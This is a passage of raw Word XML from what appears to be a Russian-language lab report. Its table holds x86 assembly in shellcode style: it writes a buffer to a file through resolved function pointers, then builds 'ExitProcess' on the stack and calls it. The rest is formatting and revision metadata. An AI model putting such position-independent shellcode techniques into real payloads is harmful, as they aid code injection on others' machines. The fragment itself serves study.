                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>, 12              </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22FAF09C" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">], </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FED615F" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20BD450B" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>    ; --- 5. Записываем данные в файл ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="180E6E1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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>lea ecx, [esi + 0x160]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA16F6B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edx, edi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583C55A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sub edx, ecx             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DADE1C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32BB2C11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0                   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5196586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lea eax, [esi + 0x4]     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FCB15A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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D0B840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edx                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD42BB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ecx                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F9E40BC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push dword [esi]         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45262EA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eax, [esi + 0x14]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64D9C6D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call eax                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AEFD9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0142E2D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; --- 6. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Закрываем</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>файл</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E0453C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dword [esi]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070EC9B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eax, [esi + 0x18]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5C6CEE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call eax                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCBDA4D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</w:p>
          <w:p w14:paraId="50828EC5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; --- 7. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Выход</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BABEA6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0x00737365          ; "ess\0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D4BDB77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0x636f7250          ; "Proc"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="722F359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0x74697845          ; "Exit"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182838D4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mov ecx, esp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A18D56F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ecx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C0FAEA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>    push ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57669296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call ebp                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15126B72" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB0BDEA" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>push</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D72C17A" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>call</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>eax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="75873DF8" w14:textId="77777777" w:rsidR="00401C70" w:rsidRDefault="00401C70" w:rsidP="0018105F">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56B26908" w14:textId="77777777" w:rsidR="00401C70" w:rsidRPr="00656D19" w:rsidRDefault="00401C70" w:rsidP="00401C70">
      <w:pPr>
        <w:pStyle w:val="affff1"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00401C70" w:rsidRPr="00656D19" w:rsidSect="00F310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56FF" w14:textId="77777777" w:rsidR="00EA7A82" w:rsidRPr="00D60F71" w:rsidRDefault="00EA7A82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10F33E0" w14:textId="77777777" w:rsidR="00EA7A82" w:rsidRPr="00D60F71" w:rsidRDefault="00EA7A82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55B6" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC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78E4EAE" w14:textId="5C237CF2" w:rsidR="002B35BC" w:rsidRPr="00C53ADA" w:rsidRDefault="002B35BC" w:rsidP="00C53ADA">
        <w:pPr>
          <w:pStyle w:val="aff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9F6BFE"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9C37" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC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823A1" w14:textId="77777777" w:rsidR="00EA7A82" w:rsidRPr="00D60F71" w:rsidRDefault="00EA7A82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0E12F62" w14:textId="77777777" w:rsidR="00EA7A82" w:rsidRPr="00D60F71" w:rsidRDefault="00EA7A82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CAC9" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC">
    <w:pPr>
      <w:pStyle w:val="a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ED92" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC">
    <w:pPr>
      <w:pStyle w:val="af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8103" w14:textId="77777777" w:rsidR="002B35BC" w:rsidRDefault="002B35BC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D0E0A5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multilevel"/>
    <w:tmpl w:val="E800CC7C"/>
    <w:name w:val="WW8Num2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33B690B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91D06C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960020A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00ECD502"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a3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0" w:firstLine="709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CA781C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F9C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C204F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7E80F12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8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80" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E081B33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35EAB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C279B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC2E29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6C5841"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F796F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7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DD7F17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4D2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123824"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99B8BE52"/>
    <w:lvl w:ilvl="0" w:tplc="4DEA7B0A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6FDA5BC5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BFD01092"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a6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071DEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="433A9156"/>
    <w:lvl w:ilvl="0" w:tplc="7B4CA77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2" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0419001B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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="754930A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3080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A56BE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D2B86110"/>
    <w:lvl w:ilvl="0" w:tplc="3FEA7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04445824">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2025357145">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="617831986">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1940868507">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="220214486">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1009673776">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1749620159">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2047023331">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="385565373">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="765619797">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1570072621">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="836193827">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1596400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42880469">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1267466905">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="264267056">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="224221663">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1488861742">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="284428744">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1532914313">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1261448065">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1502428479">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1860777750">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="427628214">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1198667575">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1175730496">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1329211175">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1158619730">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1518038098">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1297292202">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="163201702">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="699862412">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1813712994">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1155487093">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="766853895">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="702053041">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="994529114">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1803425624">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="986134150">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1587958749">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="147552827">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="105085769">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1808283668">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="148833992">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="18567695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70360908">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1830751435">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="2136286125">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1623998765">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="537282566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2165"/>
    <w:rsid w:val="000063F7"/>
    <w:rsid w:val="00012568"/>
    <w:rsid w:val="00013AA8"/>
    <w:rsid w:val="00030155"/>
    <w:rsid w:val="00035C36"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="00040250"/>
    <w:rsid w:val="000433CF"/>
    <w:rsid w:val="000434E2"/>
    <w:rsid w:val="00044958"/>
    <w:rsid w:val="00044F07"/>
    <w:rsid w:val="00046645"/>
    <w:rsid w:val="00051312"/>
    <w:rsid w:val="00054332"/>
    <w:rsid w:val="0005543F"/>
    <w:rsid w:val="000555DA"/>
    <w:rsid w:val="00056B18"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="00070B9B"/>
    <w:rsid w:val="00071796"/>
    <w:rsid w:val="000734E9"/>
    <w:rsid w:val="00073AEF"/>
    <w:rsid w:val="00076D3F"/>
    <w:rsid w:val="00082227"/>
    <w:rsid w:val="00083F4E"/>
    <w:rsid w:val="000848C7"/>
    <w:rsid w:val="00085976"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="000914A6"/>
    <w:rsid w:val="00091C82"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="000964A0"/>
    <w:rsid w:val="00097188"/>
    <w:rsid w:val="000979F6"/>
    <w:rsid w:val="00097C10"/>
    <w:rsid w:val="000A7974"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000B5DAA"/>
    <w:rsid w:val="000B7EBB"/>
    <w:rsid w:val="000D0ADB"/>
    <w:rsid w:val="000D1B4A"/>
    <w:rsid w:val="000D3FE0"/>
    <w:rsid w:val="000D5102"/>
    <w:rsid w:val="000D7F1F"/>
    <w:rsid w:val="000E0298"/>
    <w:rsid w:val="000E4EBF"/>
    <w:rsid w:val="000E5951"/>
    <w:rsid w:val="000E7DCB"/>
    <w:rsid w:val="000F292B"/>
    <w:rsid w:val="000F59CA"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="00113B7D"/>
    <w:rsid w:val="00121C01"/>
    <w:rsid w:val="001247D0"/>
    <w:rsid w:val="00124B9F"/>
    <w:rsid w:val="00125122"/>
    <w:rsid w:val="0012754F"/>
    <w:rsid w:val="00131EAF"/>
    <w:rsid w:val="00132FF0"/>
    <w:rsid w:val="0013536F"/>
    <w:rsid w:val="0013684F"/>
    <w:rsid w:val="001435DD"/>
    <w:rsid w:val="001510CC"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="0015552C"/>
    <w:rsid w:val="001561A2"/>
    <w:rsid w:val="001564CB"/>
    <w:rsid w:val="00160403"/>
    <w:rsid w:val="00160AF8"/>
    <w:rsid w:val="001622D2"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001630F2"/>
    <w:rsid w:val="00165845"/>
    <w:rsid w:val="0016790D"/>
    <w:rsid w:val="001703E0"/>
    <w:rsid w:val="00170A5F"/>
    <w:rsid w:val="001711BE"/>
    <w:rsid w:val="0018105F"/>
    <w:rsid w:val="00183280"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="001834A1"/>
    <w:rsid w:val="0018444C"/>
    <w:rsid w:val="00186B61"/>
    <w:rsid w:val="001905BB"/>
    <w:rsid w:val="00190899"/>
    <w:rsid w:val="00194F47"/>
    <w:rsid w:val="001A16A7"/>
    <w:rsid w:val="001A28A3"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001B4E24"/>
    <w:rsid w:val="001B7F84"/>
    <w:rsid w:val="001C1BED"/>
    <w:rsid w:val="001C51B9"/>
    <w:rsid w:val="001C56B8"/>
    <w:rsid w:val="001C7113"/>
    <w:rsid w:val="001D59C1"/>
    <w:rsid w:val="001D5DDF"/>
    <w:rsid w:val="001D776A"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="001F0BB2"/>
    <w:rsid w:val="001F3625"/>
    <w:rsid w:val="001F4591"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="002008D4"/>
    <w:rsid w:val="00205F03"/>
    <w:rsid w:val="00206C36"/>
    <w:rsid w:val="00233DD9"/>
    <w:rsid w:val="00236F95"/>
    <w:rsid w:val="002371AA"/>
    <w:rsid w:val="00237247"/>
    <w:rsid w:val="00241EDD"/>
    <w:rsid w:val="00242DF6"/>
    <w:rsid w:val="002468C4"/>
    <w:rsid w:val="0025065E"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="00255B80"/>
    <w:rsid w:val="002561B6"/>
    <w:rsid w:val="002578FB"/>
    <w:rsid w:val="00257EE1"/>
    <w:rsid w:val="002602E0"/>
    <w:rsid w:val="00264B26"/>
    <w:rsid w:val="002722CB"/>
    <w:rsid w:val="0027294A"/>
    <w:rsid w:val="00276809"/>
    <w:rsid w:val="002777C3"/>
    <w:rsid w:val="00280229"/>
    <w:rsid w:val="002A0287"/>
    <w:rsid w:val="002B35BC"/>
    <w:rsid w:val="002B4241"/>
    <w:rsid w:val="002B49FF"/>
    <w:rsid w:val="002B4CB1"/>
    <w:rsid w:val="002C355E"/>
    <w:rsid w:val="002C36A3"/>
    <w:rsid w:val="002C37C7"/>
    <w:rsid w:val="002C4570"/>
    <w:rsid w:val="002C4ABA"/>
    <w:rsid w:val="002D03F1"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002D7BED"/>
    <w:rsid w:val="002E2837"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E524E"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="002F0274"/>
    <w:rsid w:val="002F3F80"/>
    <w:rsid w:val="002F4913"/>
    <w:rsid w:val="002F79E9"/>
    <w:rsid w:val="00301C5A"/>
    <w:rsid w:val="003035F7"/>
    <w:rsid w:val="0030384E"/>
    <w:rsid w:val="003042FE"/>
    <w:rsid w:val="003049F7"/>
    <w:rsid w:val="00305E77"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00312F6E"/>
    <w:rsid w:val="00315A7D"/>
    <w:rsid w:val="00316821"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00325F49"/>
    <w:rsid w:val="00327521"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="003316EC"/>
    <w:rsid w:val="00334CFA"/>
    <w:rsid w:val="00340202"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="0034587B"/>
    <w:rsid w:val="003476E2"/>
    <w:rsid w:val="00350183"/>
    <w:rsid w:val="003501B8"/>
    <w:rsid w:val="0035662C"/>
    <w:rsid w:val="003606F3"/>
    <w:rsid w:val="00366381"/>
    <w:rsid w:val="00367255"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="00371E9B"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00374830"/>
    <w:rsid w:val="00377970"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00384F92"/>
    <w:rsid w:val="0038570C"/>
    <w:rsid w:val="00390342"/>
    <w:rsid w:val="00392C8B"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003A58D0"/>
    <w:rsid w:val="003A6E51"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B60AD"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003D1EF9"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003D4578"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="003E673A"/>
    <w:rsid w:val="003E7EC1"/>
    <w:rsid w:val="003F34FB"/>
    <w:rsid w:val="003F450F"/>
    <w:rsid w:val="00401C70"/>
    <w:rsid w:val="00404018"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="004076C4"/>
    <w:rsid w:val="00415444"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="00421AAE"/>
    <w:rsid w:val="004223F1"/>
    <w:rsid w:val="00426693"/>
    <w:rsid w:val="00427EEC"/>
    <w:rsid w:val="00431D57"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00437A20"/>
    <w:rsid w:val="00437BF0"/>
    <w:rsid w:val="00437F53"/>
    <w:rsid w:val="00440777"/>
    <w:rsid w:val="00441C3D"/>
    <w:rsid w:val="004437AA"/>
    <w:rsid w:val="00444071"/>
    <w:rsid w:val="004444F9"/>
    <w:rsid w:val="0044545D"/>
    <w:rsid w:val="00447CE7"/>
    <w:rsid w:val="00450830"/>
    <w:rsid w:val="0045360D"/>
    <w:rsid w:val="00453CBA"/>
    <w:rsid w:val="004557D2"/>
    <w:rsid w:val="00456F67"/>
    <w:rsid w:val="00457D40"/>
    <w:rsid w:val="00462555"/>
    <w:rsid w:val="004705DC"/>
    <w:rsid w:val="00472403"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="00475F74"/>
    <w:rsid w:val="00477D03"/>
    <w:rsid w:val="004808AC"/>
    <w:rsid w:val="00481698"/>
    <w:rsid w:val="00485490"/>
    <w:rsid w:val="004911EC"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004A6C10"/>
    <w:rsid w:val="004B0B50"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B4C9A"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004C0988"/>
    <w:rsid w:val="004C4D1C"/>
    <w:rsid w:val="004C5C5A"/>
    <w:rsid w:val="004D67B2"/>
    <w:rsid w:val="004E2AF3"/>
    <w:rsid w:val="004E533B"/>
    <w:rsid w:val="004E5F3A"/>
    <w:rsid w:val="004E68B1"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F3DA4"/>
    <w:rsid w:val="004F7490"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="00500FE0"/>
    <w:rsid w:val="00511985"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="0051707A"/>
    <w:rsid w:val="00523235"/>
    <w:rsid w:val="00524719"/>
    <w:rsid w:val="00525303"/>
    <w:rsid w:val="00527A51"/>
    <w:rsid w:val="00527D21"/>
    <w:rsid w:val="00530156"/>
    <w:rsid w:val="00532884"/>
    <w:rsid w:val="00533261"/>
    <w:rsid w:val="005336A7"/>
    <w:rsid w:val="005354CC"/>
    <w:rsid w:val="005377DE"/>
    <w:rsid w:val="00540B3A"/>
    <w:rsid w:val="005414AE"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="0054440E"/>
    <w:rsid w:val="00544F2D"/>
